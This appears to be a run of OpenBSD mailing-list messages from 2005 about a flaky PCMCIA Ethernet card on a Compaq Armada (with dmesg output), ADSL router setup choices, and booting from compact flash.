I've got an old notebook too (Toshiba 4000CDS) and my PCMCIA is a bit
strange too. During floppy installation, it's detected and mounted on
ne0, whereas in normal execution it's mounted as ne3. It's not hard to
fix the network configuration to handle this, but it makes me think
that this driver is not very "clean"... I use a Sitecom PCMCIA 10/100
Ethernet adapter.

Best regards,

Bruno.

On 11/13/05, Peter Huncar <[EMAIL PROTECTED]> wrote:
> Hello
>
> I have an old notebook: Compaq Armada 100s and I was trying to install OpenBSD
> to use it as a neat diag. computer. After being unable to use the PCMCIA D-link
> DFE-670tdx ethernet adapter a while ago (after 3.7 release) I tried two linux
> distros (ubuntu and slackware) both working fine (and the PCMCIA card worked),
> actually there was win98 before and it worked fine also.
>
> After the release of 3.8 I tried OpenBSD again without success, but I played a
> bit longer with it.
>
> When booting from floppy there is a 70% chance that the kernel recognizes the
> PCMCIA card (ne3) but after trying to use it I got a device timeout.
>
> I tried more than 10 times 3.8 bsd.rd without the kernel being able to even
> recognize the card. After installing the system from CD without initializing
> the network, the default generic kernel has the same problem, I tried it many
> times. Seems like (tried generic and rd approx 30 times together) only the
> floppy install kernel has a chance to recognize the pcmcia card, or maybe I am
> wrong, and it's a hardware issue. Anyway as I mentioned above ubuntu for
> example (3 tries ;o) )
> has no problem with this combination.
>
> I linked two dmesg outputs, one from the generic kernel boot and the other
> from the floppy boot with the card recognized.
> Is there a way to make this work?
>
> Thank you all, great job.
>
> Peter Huncar
>
>
> 
> This message was sent using IMP, the Internet Messaging Program.
> OpenBSD 3.8 (RAMDISK) #793: Sat Sep 10 16:02:31 MDT 2005
> [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/RAMDISK
> cpu0: AMD-K6(tm)-III Processor ("AuthenticAMD" 586-class) 534 MHz
> cpu0: FPU,V86,DE,PSE,TSC,MSR,MCE,CX8,PGE,MMX
> real mem  = 58236928 (56872K)
> avail mem = 48136192 (47008K)
> using 736 buffers containing 3014656 bytes (2944K) of memory
> mainbus0 (root)
> bios0 at mainbus0: AT/286+(f0) BIOS, date 01/28/00, BIOS32 rev. 0 @ 0xeb650
> apm0 at bios0: Power Management spec V1.2
> apm0: flags 30102 dobusy 0 doidle 1
> pcibios0 at bios0: rev 2.1 @ 0xe8000/0x67d
> pcibios0: PCI IRQ Routing Table rev 1.0 @ 0xfe840/80 (3 entries)
> pcibios0: PCI Interrupt Router at 000:07:0 ("VIA VT82C596A ISA" rev 0x00)
> pcibios0: PCI bus #2 is the last bus
> bios0: ROM list: 0xc/0xc000! 0xcc000/0x1000 0xe4000/0xc00!
> cpu0 at mainbus0
> pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
> pchb0 at pci0 dev 0 function 0 "VIA VT8501" rev 0x04
> ppb0 at pci0 dev 1 function 0 "VIA VT8501 AGP" rev 0x00
> pci1 at ppb0 bus 1
> vga1 at pci1 dev 0 function 0 "Trident CyberBlade i7 AGP" rev 0x5d
> wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
> pcib0 at pci0 dev 7 function 0 "VIA VT82C686 ISA" rev 0x22
> pciide0 at pci0 dev 7 function 1 "VIA VT82C571 IDE" rev 0x10: ATA66, channel 
> 0 configured to compatibility, channel 1 configured to compatibility
> wd0 at pciide0 channel 0 drive 0: 
> wd0: 16-sector PIO, LBA, 4769MB, 9767520 sectors
> wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 4
> atapiscsi0 at pciide0 channel 1 drive 0
> scsibus0 at atapiscsi0: 2 targets
> cd0 at scsibus0 targ 0 lun 0:  SCSI0 5/cdrom removable
> cd0(pciide0:1:0): using PIO mode 4, DMA mode 2
> "VIA VT83C572 USB" rev 0x10 at pci0 dev 7 function 2 not configured
> "VIA VT82C686 SMBus" rev 0x30 at pci0 dev 7 function 4 not configured
> "VIA VT82C686 AC97" rev 0x20 at pci0 dev 7 function 5 not configured
> "VIA VT82C686 Modem" rev 0x20 at pci0 dev 7 function 6 not configured
> "Texas Instruments PCI1211 CardBus" rev 0x00 at pci0 dev 10 function 0 not 
> configured
> isa0 at pcib0
> isadma0 at isa0
> pckbc0 at isa0 port 0x60/5
> pckbd0 at pckbc0 (kbd slot)
> pckbc0: using irq 1 for kbd slot
> wskbd0 at pckbd0: console keyboard, using wsdisplay0
> npx0 at isa0 port 0xf0/16: using exception 16
> pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
> pccom1 at isa0 port 0x2f8/8 irq 3: ns16550a, 16 byte fifo
> fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
> fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec
> pcic0 at isa0 port 0x3e0/2 iomem 0xd/16384
> pcic0 controller 0:  has sockets A and B
> pcmcia0 at pcic0 controller 0 socket 0
> ne3 at pcmcia0 function 0 "D-Link, DFE-670TXD, PC Card" port 0x340/32, irq 11
> ne3: address 00:11:95:23:6d:99
> nsphyter0 at ne3 phy 1: DP83815 10/100 PHY, rev. 0
> pcmcia1 at pcic0 controller 0 socket 1
> pcic0: irq 9, polling enabled
> biomask f5e5 netmask fde5 ttymask ffe7
> rd0: fixed, 3800 blocks
> dkcsum: wd0 matches BIOS drive 0x80
> root on 

Compaq ARMADA 100S with D-Link DFE-670TXD

2005-11-13 Thread Peter Huncar
Hello

I have an old notebook: Compaq Armada 100s and I was trying to install OpenBSD to
use it as a neat diag. computer. After being unable to use the PCMCIA D-link
DFE-670tdx ethernet adapter a while ago (after 3.7 release) I tried two linux
distros (ubuntu and slackware) both working fine (and the PCMCIA card worked),
actually there was win98 before and it worked fine also.

After the release of 3.8 I tried OpenBSD again without success, but I played a bit
longer with it.

When booting from floppy there is a 70% chance that the kernel recognizes the
PCMCIA card (ne3) but after trying to use it I got a device timeout.

I tried more than 10 times 3.8 bsd.rd without the kernel being able to even
recognize the card. After installing the system from CD without initializing
the network, the default generic kernel has the same problem, I tried it many
times. Seems like (tried generic and rd approx 30 times together) only the
floppy install kernel has a chance to recognize the pcmcia card, or maybe I am
wrong, and it's a hardware issue. Anyway as I mentioned above ubuntu for
example (3 tries ;o) )
has no problem with this combination.

I linked two dmesg outputs, one from the generic kernel boot and the other from
the floppy boot with the card recognized.

Is there a way to make this work?

Thank you all, great job.

Peter Huncar



This message was sent using IMP, the Internet Messaging Program.
OpenBSD 3.8 (RAMDISK) #793: Sat Sep 10 16:02:31 MDT 2005
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/RAMDISK
cpu0: AMD-K6(tm)-III Processor ("AuthenticAMD" 586-class) 534 MHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,MCE,CX8,PGE,MMX
real mem  = 58236928 (56872K)
avail mem = 48136192 (47008K)
using 736 buffers containing 3014656 bytes (2944K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(f0) BIOS, date 01/28/00, BIOS32 rev. 0 @ 0xeb650
apm0 at bios0: Power Management spec V1.2
apm0: flags 30102 dobusy 0 doidle 1
pcibios0 at bios0: rev 2.1 @ 0xe8000/0x67d
pcibios0: PCI IRQ Routing Table rev 1.0 @ 0xfe840/80 (3 entries)
pcibios0: PCI Interrupt Router at 000:07:0 ("VIA VT82C596A ISA" rev 0x00)
pcibios0: PCI bus #2 is the last bus
bios0: ROM list: 0xc/0xc000! 0xcc000/0x1000 0xe4000/0xc00!
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "VIA VT8501" rev 0x04
ppb0 at pci0 dev 1 function 0 "VIA VT8501 AGP" rev 0x00
pci1 at ppb0 bus 1
vga1 at pci1 dev 0 function 0 "Trident CyberBlade i7 AGP" rev 0x5d
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
pcib0 at pci0 dev 7 function 0 "VIA VT82C686 ISA" rev 0x22
pciide0 at pci0 dev 7 function 1 "VIA VT82C571 IDE" rev 0x10: ATA66, channel 0 
configured to compatibility, channel 1 configured to compatibility
wd0 at pciide0 channel 0 drive 0: 
wd0: 16-sector PIO, LBA, 4769MB, 9767520 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 4
atapiscsi0 at pciide0 channel 1 drive 0
scsibus0 at atapiscsi0: 2 targets
cd0 at scsibus0 targ 0 lun 0:  SCSI0 5/cdrom removable
cd0(pciide0:1:0): using PIO mode 4, DMA mode 2
"VIA VT83C572 USB" rev 0x10 at pci0 dev 7 function 2 not configured
"VIA VT82C686 SMBus" rev 0x30 at pci0 dev 7 function 4 not configured
"VIA VT82C686 AC97" rev 0x20 at pci0 dev 7 function 5 not configured
"VIA VT82C686 Modem" rev 0x20 at pci0 dev 7 function 6 not configured
"Texas Instruments PCI1211 CardBus" rev 0x00 at pci0 dev 10 function 0 not 
configured
isa0 at pcib0
isadma0 at isa0
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard, using wsdisplay0
npx0 at isa0 port 0xf0/16: using exception 16
pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
pccom1 at isa0 port 0x2f8/8 irq 3: ns16550a, 16 byte fifo
fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec
pcic0 at isa0 port 0x3e0/2 iomem 0xd/16384
pcic0 controller 0:  has sockets A and B
pcmcia0 at pcic0 controller 0 socket 0
ne3 at pcmcia0 function 0 "D-Link, DFE-670TXD, PC Card" port 0x340/32, irq 11
ne3: address 00:11:95:23:6d:99
nsphyter0 at ne3 phy 1: DP83815 10/100 PHY, rev. 0
pcmcia1 at pcic0 controller 0 socket 1
pcic0: irq 9, polling enabled
biomask f5e5 netmask fde5 ttymask ffe7
rd0: fixed, 3800 blocks
dkcsum: wd0 matches BIOS drive 0x80
root on rd0a
rootdev=0x1100 rrootdev=0x2f00 rawdev=0x2f02
OpenBSD 3.8 (GENERIC) #138: Sat Sep 10 15:41:37 MDT 2005
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: AMD-K6(tm)-III Processor ("AuthenticAMD" 586-class) 534 MHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,MCE,CX8,PGE,MMX
real mem  = 58236928 (56872K)
avail mem = 45486080 (44420K)
using 736 buffers containing 3014656 bytes (2944K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(f0) BIOS, date 01/28/00, BIOS32 rev. 0 @ 0xeb650
apm0 at bios0: Power Management spec V1.2
apm0: battery life expectancy 99%
apm0: AC on, battery charge unknown, charging, estimated 0:02 hours
apm0: fl

Re: OpenBSD as a router for my ADSL ?

2005-11-13 Thread Jasper Lievisse Adriaanse
On Sun, 13 Nov 2005 12:52:32 +0300
Bruno Carnazzi <[EMAIL PROTECTED]> wrote:

[...]
> 
>   * Try to use this SAGEM [EMAIL PROTECTED] 800 E2L. Uhm... OBSD recognized
> it as ugen0 (ueagle seems not to work).
[..]
 
Read "man 4 ugen" and you would've noticed that your modem will probably work
with the tun(4) driver, like my USB modem.

> Best regards,
> 
> Bruno.
> 
Cheers,
Jasper


-- 
"Security is decided by quality" -- Theo de Raadt



OpenBSD as a router for my ADSL ?

2005-11-13 Thread Bruno Carnazzi
Hi all,

My all-in-one router/switch/ADSL modem/AP just crashed (power
failure). Damned. Back to my USB modem :( I've also set up an OpenBSD 3.8
box at home, on a Toshiba laptop (4000CDS, PII-233MHz, 32MB RAM, 4GB
IDE HD). Let's rethink our Internet access :)

Currently, I just have 1 NIC (PCMCIA, works well), but I'll buy a
second. I'd like to make this OBSD box my filtering router/NAT for my
Internet access. Here are the scenarios:

  * Try to use this SAGEM [EMAIL PROTECTED] 800 E2L. Uhm... OBSD recognized it
as ugen0 (ueagle seems not to work). Let's suppose it worked: can my
CPU sustain PPPoA at 2Mbps? I've read it generates a heavy CPU
load (maybe because of the USB port). Also, it's a USB 1.0 port. I
don't think this way is a good idea :)

  * Buy an ADSL modem and configure it as a bridge (and buy a second
NIC for my OBSD box). This way, I've got a public IP on the router
through PPPoE. As I don't use USB, will my CPU handle the traffic
correctly? Uhm... Seems good.

  * Buy an ADSL router. This way, the public IP is on the router, and I
have to create a pseudo-public LAN between my ADSL router and my OBSD
box. Later, I'd like to build some IPSec tunnel from OBSD. I think
this way of doing it will give me trouble with IPSec, no?

  * Go live in the mountains, and stay far from technology... Uhm,
seems good too :)

Thank you for your advice,

Best regards,

Bruno.



Re: Building a bootable CF w/ a RAM-disk kernel

2005-11-13 Thread Damien Miller
On Sat, 12 Nov 2005 21:54:42 -0600
J Moore <[EMAIL PROTECTED]> wrote:

> The readme file in flashboot contains an overview of building the 
> ram-disk kernel. What it doesn't explain is how to install the kernel on 
> the CF, or prepare the CF for booting the kernel.

There are some extra instructions in the latest version of the README:
http://cvsweb.mindrot.org/index.cgi/~checkout~/flashboot/README?rev=HEAD

These start by recommending that you read the boot(8) and 
installboot(8) manpages.

-d